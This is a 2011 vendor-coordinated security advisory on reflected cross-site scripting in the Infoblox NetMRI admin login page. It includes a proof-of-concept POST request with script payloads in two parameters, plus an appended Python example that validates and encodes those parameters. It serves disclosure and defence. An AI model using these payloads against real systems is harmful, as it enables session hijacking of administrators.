============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-004
- Original release date: November 10, 2011
- Discovered by: Jose Carlos de Arriba - Senior Security Analyst at Foreground Security
- Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)
- Severity: 4.3/10 (Base CVSS Score)
============================================================

I. VULNERABILITY
-------------------------
Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 Multiple Cross Site Scripting - XSS (prior versions have not been checked but could be vulnerable too).

II. BACKGROUND
-------------------------
Infoblox NetMRI is a network automation solution for configuration, optimization and compliance enforcement. With hundreds of built-in rules and industry best practices, it automates network change, intelligently manages device configurations and reduces the risk of human error.

III. DESCRIPTION
-------------------------
Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 contain multiple Cross-Site Scripting vulnerabilities in the "eulaAccepted" and "mode" parameters of the admin login page, due to insufficient sanitization of user-supplied data and insufficient output encoding. A malicious user could perform session hijacking or phishing attacks.

IV. PROOF OF CONCEPT
-------------------------
POST /netmri/config/userAdmin/login.tdf HTTP/1.1
Content-Length: 691
Cookie: XXXX
Host: netmrihost:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false

V. BUSINESS IMPACT
-------------------------
An attacker could perform session hijacking or phishing attacks.

VI. SYSTEMS AFFECTED
-------------------------
Infoblox NetMRI 6.2.1 (latest), 6.1.2 and 6.0.2 branches (prior versions have not been checked but could be vulnerable too).

VII. SOLUTION
-------------------------
Vulnerability fixed in version 6.2.2, available as of 10 Nov 2011.
The following security patches are also available:
- v6.2.1-NETMRI-8831
- v6.1.2-NETMRI-8831
- v6.0.2-NETMRI-8831

VIII. REFERENCES
-------------------------
http://www.infoblox.com/en/products/netmri.html
http://www.foregroundsecurity.com/
http://www.painsec.com

IX. CREDITS
-------------------------
This vulnerability was discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com).

X. REVISION HISTORY
-------------------------
- November 10, 2011: Initial release.

XI. DISCLOSURE TIMELINE
-------------------------
August 28, 2011: Vulnerability discovered by Jose Carlos de Arriba.
August 28, 2011: Vendor contacted by email.
August 29: Vendor response asking for details.
September 21, 2011: Security advisory sent to vendor.
November 10, 2011: Security Fix released by vendor.
November 10, 2011: Security advisory released.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
jcarriba (at) foregroundsecurity (dot) com
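
An added example, not part of the original advisory or of Infoblox's code: a Python illustration of the two controls section III says were insufficient for "eulaAccepted" and "mode", an allow-list check on the submitted form body and HTML encoding of the reflected value. The allow-list pattern, the hidden-field rendering and the benign sample values are assumptions; the first sample body is the form body from section IV.

```python
import html
import re
from urllib.parse import parse_qs

# Parameters the advisory names as reflected without encoding.
REFLECTED_PARAMS = ("eulaAccepted", "mode")
# Assumption: legitimate values are short alphanumeric tokens.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{0,32}")


def suspicious_params(body: str) -> dict:
    """Return {param: [values]} for reflected params whose URL-decoded
    value falls outside the allow-list (reject or alert on these)."""
    fields = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name in REFLECTED_PARAMS:
        bad = [v for v in fields.get(name, []) if not SAFE_VALUE.fullmatch(v)]
        if bad:
            hits[name] = bad
    return hits


def render_hidden_field(name: str, value: str) -> str:
    """Echo a value into the login form with HTML attribute encoding.
    Assumption: the page reflects the value inside a hidden input."""
    return '<input type="hidden" name="{}" value="{}">'.format(
        html.escape(name, quote=True), html.escape(value, quote=True))


# Form body taken from section IV of the advisory.
POC_BODY = ("formStack=netmri/config/userAdmin/login"
            "&eulaAccepted=<script>alert(document.cookie)</script>"
            "&mode=<script>alert(document.cookie)</script>"
            "&skipjackPassword=ForegroundSecurity"
            "&skipjackUsername=ForegroundSecurity&weakPassword=false")
# Constructed benign login body (parameter values are assumptions).
BENIGN_BODY = ("formStack=netmri/config/userAdmin/login&eulaAccepted=true"
               "&mode=login&skipjackUsername=admin&skipjackPassword=x")

if __name__ == "__main__":
    print(suspicious_params(POC_BODY))      # both parameters flagged
    print(suspicious_params(BENIGN_BODY))   # nothing flagged
    print(render_hidden_field("mode", "<script>alert(document.cookie)</script>"))
```

Because parse_qs URL-decodes before the check, percent-encoded markup in either parameter is flagged the same way as the literal form.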